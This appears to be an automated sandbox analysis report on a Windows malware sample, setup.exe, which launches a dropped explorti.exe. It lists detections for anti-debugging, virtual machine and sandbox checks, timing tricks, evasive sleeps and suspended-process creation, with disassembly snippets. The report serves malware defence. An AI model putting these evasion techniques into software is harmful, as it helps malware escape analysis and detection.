Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0919 second address: 4DA0960 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FF32CFB71FFh 0x00000009 or ax, A41Eh 0x0000000e jmp 00007FF32CFB7209h 0x00000013 popfd 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr fs:[00000000h], eax 0x0000001f pushad 0x00000020 mov eax, 0E068F39h 0x00000025 push eax 0x00000026 push edx 0x00000027 push ecx 0x00000028 pop ebx 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe	RDTSC instruction interceptor: First address: 4DA0960 second address: 4DA0A94 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007FF32CDD6570h 0x00000008 sbb cl, 00000048h 0x0000000b jmp 00007FF32CDD656Bh 0x00000010 popfd 0x00000011 pop edx 0x00000012 pop eax 0x00000013 popad 0x00000014 mov esi, dword ptr [ebp+08h] 0x00000017 jmp 00007FF32CDD6576h 0x0000001c mov eax, dword ptr [esi+10h] 0x0000001f jmp 00007FF32CDD6570h 0x00000024 test eax, eax 0x00000026 pushad 0x00000027 mov ax, 806Dh 0x0000002b mov bx, ax 0x0000002e popad 0x0000002f jne 00007FF39F3758CEh 0x00000035 jmp 00007FF32CDD6574h 0x0000003a sub eax, eax 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007FF32CDD6577h 0x00000043 sbb ch, FFFFFFFEh 0x00000046 jmp 00007FF32CDD6579h 0x0000004b popfd 0x0000004c push esi 0x0000004d pushfd 0x0000004e jmp 00007FF32CDD6577h 0x00000053 sbb cl, 0000000Eh 0x00000056 jmp 00007FF32CDD6579h 0x0000005b popfd 0x0000005c pop ecx 0x0000005d popad 0x0000005e mov dword ptr [ebp-20h], eax 0x00000061 jmp 00007FF32CDD6577h 0x00000066 mov ebx, dword ptr [esi] 0x00000068 jmp 00007FF32CDD6576h 0x0000006d mov dword ptr [ebp-24h], ebx 0x00000070 push eax 0x00000071 push edx 0x00000072 jmp 00007FF32CDD6577h 0x00000077 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31EFBC second address: 31E7EC instructions: 0x00000000 rdtsc 0x00000002 jno 00007FF32CFB71F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c pushad 0x0000000d cld 0x0000000e mov dword ptr [ebp+122D1CC1h], edi 0x00000014 popad 0x00000015 push dword ptr [ebp+122D0B15h] 0x0000001b mov dword ptr [ebp+122D1C24h], ebx 0x00000021 call dword ptr [ebp+122D26DAh] 0x00000027 pushad 0x00000028 sub dword ptr [ebp+122D1B97h], ecx 0x0000002e xor eax, eax 0x00000030 mov dword ptr [ebp+122D1B97h], eax 0x00000036 mov edx, dword ptr [esp+28h] 0x0000003a jmp 00007FF32CFB7208h 0x0000003f mov dword ptr [ebp+122D34ECh], eax 0x00000045 mov dword ptr [ebp+122D1B97h], eax 0x0000004b mov esi, 0000003Ch 0x00000050 jp 00007FF32CFB71F7h 0x00000056 add esi, dword ptr [esp+24h] 0x0000005a jmp 00007FF32CFB7209h 0x0000005f lodsw 0x00000061 clc 0x00000062 add eax, dword ptr [esp+24h] 0x00000066 clc 0x00000067 mov ebx, dword ptr [esp+24h] 0x0000006b pushad 0x0000006c mov dword ptr [ebp+122D1B97h], ecx 0x00000072 sub eax, dword ptr [ebp+122D3414h] 0x00000078 popad 0x00000079 nop 0x0000007a pushad 0x0000007b jbe 00007FF32CFB71FCh 0x00000081 jp 00007FF32CFB71F6h 0x00000087 push edi 0x00000088 push eax 0x00000089 push edx 0x0000008a rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 31E7EC second address: 31E7FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007FF32CDD6566h 0x00000010 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 479D49 second address: 479D6B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007FF32CFB7205h 0x0000000a jl 00007FF32CFB71F6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495EAE second address: 495EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495EB2 second address: 495F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FF32CFB7206h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007FF32CFB7208h 0x00000011 jmp 00007FF32CFB7209h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495F02 second address: 495F07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 495F07 second address: 495F0C instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 496060 second address: 49609F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 jmp 00007FF32CDD656Fh 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007FF32CDD6566h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 jnc 00007FF32CDD6566h 0x0000001f popad 0x00000020 jmp 00007FF32CDD6575h 0x00000025 rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 4961D3 second address: 4961E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push esi 0x00000006 jne 00007FF32CFB71F6h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 498DBA second address: 498E34 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FF32CDD6566h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FF32CDD6571h 0x0000000f popad 0x00000010 add dword ptr [esp], 0C9E1D41h 0x00000017 jc 00007FF32CDD6569h 0x0000001d push 00000003h 0x0000001f push 00000000h 0x00000021 push ebp 0x00000022 call 00007FF32CDD6568h 0x00000027 pop ebp 0x00000028 mov dword ptr [esp+04h], ebp 0x0000002c add dword ptr [esp+04h], 0000001Bh 0x00000034 inc ebp 0x00000035 push ebp 0x00000036 ret 0x00000037 pop ebp 0x00000038 ret 0x00000039 movzx edx, si 0x0000003c push 00000000h 0x0000003e mov esi, edx 0x00000040 mov cx, E9AAh 0x00000044 push 00000003h 0x00000046 mov edi, dword ptr [ebp+122D26E0h] 0x0000004c push 6C589B65h 0x00000051 pushad 0x00000052 jnc 00007FF32CDD656Ch 0x00000058 push eax 0x00000059 push edx 0x0000005a push eax 0x0000005b push edx 0x0000005c rdtsc
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	RDTSC instruction interceptor: First address: 498E34 second address: 498E38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: C8E792 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: C8E835 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: E2F857 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: E3CFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe	Special instruction interceptor: First address: EC77FB instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 31E792 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 31E835 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 4BF857 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 4CCFB4 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Special instruction interceptor: First address: 5577FB instructions caused by: Self-modifying code

Contains capabilities to detect virtual machines

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04DF04DA rdtsc

Contains long sleeps (>= 3 min)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Thread delayed: delay time: 180000

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 408	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 499	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Window / User API: threadDelayed 8164	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416	Thread sleep count: 49 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4416	Thread sleep time: -98049s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424	Thread sleep count: 39 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 1424	Thread sleep time: -78039s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740	Thread sleep count: 408 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 2740	Thread sleep time: -12240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3660	Thread sleep time: -180000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep count: 499 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep time: -998499s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep count: 8164 > 30	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4040	Thread sleep time: -16336164s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\setup.exe

File Volume queried: C:\ FullSizeInformation

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread delayed: delay time: 180000			Jump to behavior

Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: explorti.exe, 0000000A.00000002.3368400813.0000000001719000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWp
Source: explorti.exe, 0000000A.00000002.3368400813.000000000174B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2185921092.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000002.00000002.2229049085.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000003.00000002.2230169054.00000000004A1000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,

Source: C:\Users\user\Desktop\setup.exe

System information queried: ModuleInformation

Source: C:\Users\user\Desktop\setup.exe

Process information queried: ProcessInformation

Hides threads from debuggers

Anti Debugging

Source: C:\Users\user\Desktop\setup.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Checks for debuggers (devices)

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	File opened: SIWVID

Checks if the current process is being debugged

Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\setup.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Process queried: DebugPort	Jump to behavior

Contains functionality for execution timing, often used to detect debuggers

Source: C:\Users\user\Desktop\setup.exe

Code function: 0_2_04DF04DA rdtsc

Contains functionality to read the PEB

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002E645B mov eax, dword ptr fs:[00000030h]		10_2_002E645B
Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe	Code function: 10_2_002EA1C2 mov eax, dword ptr fs:[00000030h]		10_2_002EA1C2

Creates a process in suspended mode (likely to inject code)

Source: C:\Users\user\Desktop\setup.exe

Process created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe"

Contains functionality to query CPU information (cpuid)

Source: explorti.exe, explorti.exe, 0000000A.00000002.3365938675.00000000004A1000.00000040.00000001.01000000.00000007.sdmp

Binary or memory string: 35Program Manager

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Code function: 10_2_002CD312 cpuid

10_2_002CD312

Queries the volume information (name, serial number etc) of a device

Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Queries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformation